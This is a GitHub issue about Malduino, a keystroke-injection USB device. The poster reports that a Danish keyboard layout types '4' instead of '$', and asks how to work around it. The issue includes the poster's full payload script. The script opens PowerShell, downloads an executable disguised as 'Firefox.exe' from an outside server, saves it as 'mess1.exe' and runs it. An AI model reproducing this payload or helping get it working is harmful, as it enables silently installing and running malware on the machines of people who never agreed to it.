Skip to content

Problem with keyboard language #48

@TermiTrack

Description

@TermiTrack

I have some issues with the Danish keyboard language with the symbol ( $ ) probally others too.
I have read some of these issues on this page but could not find any solution for my problem.

I have a script which contains the symbol ( $ ) and when it's pressed by the Malduino it writes 4 instead of $.
I'm not sure why it's giving me issues cuz when i look into the code of the elite.ino it apperas to be supported.

If there is no way around this do anyone know a replacement for the symbol in this script:

REM Windows 10: Poweshell administrator download and execute file
DELAY 5000
GUI
DELAY 200
STRING Windows PowerShell
DELAY 200
ENTER
DELAY 3000
STRING $down = New-Object System.Net.WebClient; $url = 'https://srv-store6.dwn/download/FqiiSM/Firefox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
DELAY 1000
ENTER

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions